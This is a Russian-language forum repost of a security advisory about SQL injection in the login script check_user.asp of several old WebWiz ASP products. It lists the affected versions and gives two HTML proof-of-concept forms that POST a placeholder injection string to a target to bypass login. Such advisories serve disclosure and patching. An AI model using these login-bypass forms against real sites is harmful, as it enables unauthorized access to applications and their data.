• XSS.stack #1 – первый литературный журнал от юзеров форума

Web WebWiz

Ŧ1LAN

CPU register
Пользователь
Регистрация
19.12.2005
Сообщения
1 057
Решения
1
Реакции
6
SQL-инъекция в продуктах WebWiz
Программа:
webwiz site news access2000 : vesion 3.06 и более ранние версии
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 и более ранние версии
database login access2000 : version 1.71 и более ранние версии
webwiz site news access97 : version 3.06 и более ранние версии
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 и более ранние версии
database login access97 : version 1.71 и более ранние версии
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует при обработке входных данных в параметре 'txtUserName' в сценарии "check_user.asp". Удаленный пользователь может послать специально сформированный HTTP POST запрос и выполнить произвольные SQL команды в базе данных приложения.
Пример:

Код:
<html>
< h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
< p> Discovery and exploit by devil_box [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
< form method="POST" action="http://target/[product]/check_user.asp">
< input type="hidden" name="txtUserName" value="[SQL INJECTION]">
< input type="hidden" name="txtUserPass" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html> 

<html>
< h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
< p> Discovery and exploit by devil_box [at} kapda.ir</p>
< p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
< form method="POST" action="http://target/[product]/check_user.asp">
< input type="hidden" name="txtUserName" value="[SQL INJECTION]">
< input type="hidden" name="txtUserPass" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>
:zns2: www.webwizguide.info
Источник: www.securitylab.ru
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх